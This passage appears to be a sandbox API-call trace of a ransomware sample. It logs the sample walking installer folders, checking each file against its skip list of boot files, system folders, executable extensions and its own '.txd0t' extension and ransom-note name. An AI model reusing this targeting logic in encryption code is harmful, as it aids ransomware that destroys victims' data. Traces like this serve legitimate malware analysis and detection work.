(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.430] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.430] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.430] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.430] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.430] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.430] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.430] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.430] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.430] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.430] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0071.430] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0071.430] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0071.431] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.431] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.431] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.431] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.431] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.431] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.431] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.431] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.431] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.431] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.431] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.431] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.431] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.431] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.431] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0071.431] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0071.431] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" [0071.431] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.431] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.432] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.432] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.432] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.432] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.432] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0071.432] GetProcessHeap () returned 0xe30000 [0071.432] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.432] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0071.432] StrCmpW (psz1="1046", psz2=".") returned 1 [0071.432] StrCmpW (psz1="1046", psz2="..") returned 1 [0071.432] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.432] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.432] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1046", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0071.432] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system32\\") returned 0x0 [0071.432] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.432] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\local\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\boot\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\perflogs\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\programdata\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\drivers\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\wsus\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="crypt_detect") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="cryptolocker") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="ransomware") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\WINDOWS") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.433] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files") returned 0x0 [0071.433] GetProcessHeap () returned 0xe30000 [0071.433] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.433] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0071.433] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\*") returned="C:\\588bce7c90097ed212\\1046\\*" [0071.433] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0071.434] StrCmpW (psz1=".", psz2=".") returned 0 [0071.434] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.434] StrCmpW (psz1="..", psz2=".") returned 1 [0071.434] StrCmpW (psz1="..", psz2="..") returned 0 [0071.434] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.434] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.434] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.434] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0071.434] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0071.434] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="C:\\588bce7c90097ed212\\1046\\eula.rtf" [0071.434] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.434] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.434] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.435] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.435] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.435] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.435] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.435] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.435] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.435] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.435] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.435] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.435] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.435] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.435] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.435] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.435] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.435] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.435] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.435] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0071.435] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0071.435] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0071.435] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.435] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.435] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.436] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.436] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.436] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.436] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.436] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.436] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.436] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.436] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.436] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.436] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.436] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.436] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.436] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.436] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.436] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.436] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.436] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0071.436] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0071.436] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" [0071.436] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.436] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.436] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.437] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.437] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.437] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.437] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.437] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.437] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.437] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.437] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0071.437] GetProcessHeap () returned 0xe30000 [0071.437] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.437] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, 